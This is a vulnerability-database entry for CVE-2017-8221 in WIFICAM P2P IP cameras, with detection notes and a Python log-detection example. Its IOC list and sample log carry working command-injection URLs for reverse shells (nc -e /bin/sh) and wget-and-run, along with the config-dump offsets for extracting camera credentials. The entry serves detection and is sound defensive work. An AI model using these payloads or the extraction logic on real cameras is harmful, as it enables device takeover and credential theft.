CVE-2017-8221
Published: 2017-04-25
Priority: P2 (73), high
CVSS 3.0: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 2.69% (84.0th percentile)
Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android application and a camera device, which allows remote attackers to obtain sensitive information by sniffing the network.
Detection & IOCs (extracted from sources)
URLs (from the PoC; %s marks where the PoC substitutes the login credentials):
- /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
- /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
- /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://192.168.1.1/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0
Bytes (credential marker in the config dump):
- 0x0a 0x0a 0x0a 0x0a 0x01
- Detect HTTP GET requests to /set_ftp.cgi or /ftptest.cgi on port 80 whose 'pwd' parameter contains shell command-substitution patterns (e.g. $(nc ...), $(wget ...)); these are the RCE trigger endpoints.
- Credential extraction from the camera config response keys on a binary marker (four consecutive 0x0a bytes followed by 0x01); the username sits at offset +138 and the password at +170 from that marker. Monitor for unauthenticated config-dump requests.
- The vulnerability itself is the cleartext UDP tunnel (the Cloud feature) used for camera communication; monitor for unencrypted UDP traffic to/from WIFICAM P2P devices carrying credential material.
- The two-stage RCE first stores a reverse-shell command via /set_ftp.cgi (pwd parameter), then triggers its execution via /ftptest.cgi. Detect the sequential pair of GET requests to these two endpoints from the same source IP.
- The REMOTE_HOST and REMOTE_PORT values in the PoC are compile-time constants (192.168.1.1 / 1337); real attackers substitute their own callback IP and port, so these specific values should not be treated as fixed IOCs.
- The PoC notes an alternative credential-extraction marker (0006 0606 0606 0100 000a) and a fallback of scanning for the string 'admin' and reading the 31 bytes after it; detection logic should account for both patterns.
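As an added example (not code from this page or from the PoC), the detection notes above run as Python over constructed data: the injected 'pwd' parameter on /set_ftp.cgi, the set_ftp.cgi then ftptest.cgi pair from one source IP, and the config-dump marker with its +138/+170 offsets plus the 'admin' fallback. The combined-format access log, the config blob layout, the 32-byte field length, the 60-second pairing window and the callback address 203.0.113.9:4444 are assumptions made for the example, not values from the page.

```python
# Added example (not the page's or PoC's code); log lines, config blob, field
# length, window and callback 203.0.113.9:4444 are constructed placeholders.
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed access log: injected set_ftp.cgi + ftptest.cgi trigger from one
# host, then a benign set_ftp.cgi and an unrelated request from other hosts.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2017:10:00:01 +0000] "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+203.0.113.9+4444+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0 HTTP/1.1" 200 12
10.0.0.5 - - [25/Apr/2017:10:00:02 +0000] "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin HTTP/1.1" 200 12
10.0.0.7 - - [25/Apr/2017:10:05:00 +0000] "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=10.0.0.2&port=21&user=ftp&pwd=Secret1&dir=/&mode=PORT&upload_interval=0 HTTP/1.1" 200 12
10.0.0.9 - - [25/Apr/2017:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)
RCE_ENDPOINTS = ("/set_ftp.cgi", "/ftptest.cgi")
# Command substitution / chaining characters in the URL-decoded pwd value.
SHELL_RE = re.compile(r"\$\(|`|;|\|")

def parse_line(line):
    """Parse one access-log line into src, timestamp, path and decoded query."""
    m = LOG_RE.match(line)
    if not m:
        return None
    u = urlsplit(m["url"])
    return {
        "src": m["src"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": u.path,
        "query": parse_qs(u.query, keep_blank_values=True),
    }

def is_injection(req):
    """True for /set_ftp.cgi requests whose pwd parameter carries shell syntax."""
    if req["path"] != "/set_ftp.cgi":
        return False
    return any(SHELL_RE.search(v) for v in req["query"].get("pwd", []))

def find_rce_pairs(lines, window_s=60):
    """Stage-2 detection: an injected set_ftp.cgi followed within window_s by
    ftptest.cgi from the same source IP. Returns (src, trigger_ts) tuples."""
    pending = defaultdict(list)  # src -> timestamps of injected set_ftp.cgi calls
    hits = []
    for line in lines:
        req = parse_line(line)
        if req is None or req["path"] not in RCE_ENDPOINTS:
            continue
        if is_injection(req):
            pending[req["src"]].append(req["ts"])
        elif req["path"] == "/ftptest.cgi":
            if any(0 <= (req["ts"] - t).total_seconds() <= window_s
                   for t in pending[req["src"]]):
                hits.append((req["src"], req["ts"]))
    return hits

# Credential markers in the config dump, as described in the PoC notes.
MARKER = b"\x0a\x0a\x0a\x0a\x01"
ALT_MARKER = bytes.fromhex("0006060606060100000a")
USER_OFF, PASS_OFF = 138, 170
FIELD_LEN = 32  # assumed: username spans +138..+170, password taken as same size

def _cstr(buf):
    return buf.split(b"\x00", 1)[0].decode("ascii", errors="replace")

def has_config_marker(blob):
    """Content match for either marker pattern in a config-dump response."""
    return MARKER in blob or ALT_MARKER in blob

def extract_creds(blob):
    """(username, password) via the primary marker offsets, else the 'admin'
    fallback (31 bytes after the string, treated here as the password), else None."""
    i = blob.find(MARKER)
    if i != -1:
        return (_cstr(blob[i + USER_OFF:i + USER_OFF + FIELD_LEN]),
                _cstr(blob[i + PASS_OFF:i + PASS_OFF + FIELD_LEN]))
    i = blob.find(b"admin")
    if i != -1:
        return ("admin", _cstr(blob[i + 5:i + 5 + 31]))
    return None

def build_sample_config(user, pwd):
    """Constructed config dump laid out so the marker offsets line up."""
    blob = bytearray(b"\x00" * 16) + MARKER
    base = 16
    blob += b"\x00" * (base + USER_OFF - len(blob))
    blob += user.encode().ljust(FIELD_LEN, b"\x00")
    blob += b"\x00" * (base + PASS_OFF - len(blob))
    blob += pwd.encode().ljust(FIELD_LEN, b"\x00")
    return bytes(blob)

if __name__ == "__main__":
    print(find_rce_pairs(SAMPLE_LOG.splitlines()))
    print(extract_creds(build_sample_config("admin", "hunter2")))
```

The pairing check deliberately keys on the same source IP and a short window rather than on the 192.168.1.1:1337 callback constants, for the reason given in the notes: the callback address is whatever the attacker compiled in. The single-request check (`is_injection`) fires on the first stage alone, so the pair detector is a confirmation signal, not the only alert.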
CVSS provenance
- NVD v3.0: 7.5 HIGH, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- NVD v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N
- VulnCheck: 7.5 HIGH
GHSA
GHSA-q969-xqr9-mmq7 (ghsa_unreviewed, 2022-05-13): CVE-2017-8221 [HIGH], CWE-311
Description: identical to the CVE summary above.
VulnCheck
CVE-2017-8221 [HIGH]: wificam wireless_ip_camera_(p2p)_firmware, Missing Encryption of Sensitive Data (vulncheck, 2017, CVSS 7.5)
Description: identical to the CVE summary above.
Affected: wificam wireless_ip_camera_(p2p)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
No detection rules found.
No writeups or analysis indexed.